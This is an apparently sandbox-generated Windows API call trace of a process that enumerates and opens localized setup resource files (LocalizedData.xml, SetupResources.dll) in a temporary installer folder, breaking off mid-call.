[0060.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.524] AreFileApisANSI () returned 1 [0060.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.525] AreFileApisANSI () returned 1 [0060.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0060.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 45 [0060.525] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.525] GetFileType (hFile=0x424) returned 0x1 [0060.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.525] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.525] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.526] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.526] CloseHandle (hObject=0x424) returned 1 [0060.526] AreFileApisANSI () returned 1 [0060.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0060.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 45 [0060.526] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.526] GetFileType (hFile=0x424) returned 0x1 [0060.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0060.526] CloseHandle (hObject=0x424) returned 1 [0060.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.527] AreFileApisANSI () returned 1 [0060.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0060.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 45 [0060.527] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa)) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.527] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0060.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.528] AreFileApisANSI () returned 1 [0060.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.529] AreFileApisANSI () returned 1 [0060.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0060.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 46 [0060.529] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.529] GetFileType (hFile=0x424) returned 0x1 [0060.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.529] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.529] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.530] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.530] CloseHandle (hObject=0x424) returned 1 [0060.530] AreFileApisANSI () returned 1 [0060.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0060.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 46 [0060.530] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.530] GetFileType (hFile=0x424) returned 0x1 [0060.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.530] CloseHandle (hObject=0x424) returned 1 [0060.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.531] AreFileApisANSI () returned 1 [0060.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0060.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 46 [0060.531] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.531] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46360, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䥘")) returned 0 [0060.532] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.532] AreFileApisANSI () returned 1 [0060.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1032", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1032", lpUsedDefaultChar=0x0) returned 27 [0060.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0060.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 